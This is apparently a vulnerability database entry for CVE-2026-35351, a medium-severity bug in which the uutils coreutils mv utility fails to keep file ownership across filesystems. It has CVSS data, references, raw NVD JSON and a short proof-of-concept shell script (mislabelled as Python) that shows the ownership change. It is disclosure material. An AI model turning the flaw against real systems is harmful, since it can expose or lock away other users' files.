CVE-2026-35351

Description

The mv utility in uutils coreutils fails to preserve file ownership during moves across different filesystem boundaries. The utility falls back to a copy-and-delete routine that creates the destination file using the caller's UID/GID rather than the source's metadata. This flaw breaks backups and migrations, causing files moved by a privileged user (e.g., root) to become root-owned unexpectedly, which can lead to information disclosure or restricted access for the intended owners.

CVSS Details

CVSS Score

4.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE

uutils coreutils (具体受影响版本请参考GitHub Issue #9714)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-35351: uutils coreutils mv ownership preservation issue
# Scenario: Moving a file from one filesystem to another using uutils mv

# Setup: Create two directories on different filesystems (simulated)
SRC_FS="/tmp/source_fs"
DST_FS="/tmp/dest_fs"

# Create test file as a non-root user (e.g., user 'nobody')
sudo -u nobody touch "$SRC_FS/testfile.txt"
echo "[+] Original file ownership:"
ls -l "$SRC_FS/testfile.txt"

# Execute the move as root across filesystem boundaries
# This mimics an admin moving data, triggering the vulnerable copy-and-delete path
./uutils-mv "$SRC_FS/testfile.txt" "$DST_FS/testfile.txt"

echo "[+] File ownership after move:"
ls -l "$DST_FS/testfile.txt"

# Expected Vulnerable Result: The file is now owned by root, not nobody
# Expected Correct Result: The file should still be owned by nobody

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35351
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35351
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35351/
[4] VulDB https://vuldb.com/cve/CVE-2026-35351
[5] https://github.com/uutils/coreutils/issues/9714
[6] https://github.com/uutils/coreutils/issues/9714

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35351", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:37.457", "lastModified": "2026-04-27T12:28:10.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mv utility in uutils coreutils fails to preserve file ownership during moves across different filesystem boundaries. The utility falls back to a copy-and-delete routine that creates the destination file using the caller's UID/GID rather than the source's metadata. This flaw breaks backups and migrations, causing files moved by a privileged user (e.g., root) to become root-owned unexpectedly, which can lead to information disclosure or restricted access for the intended owners."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/9714", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/uutils/coreutils/issues/9714", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}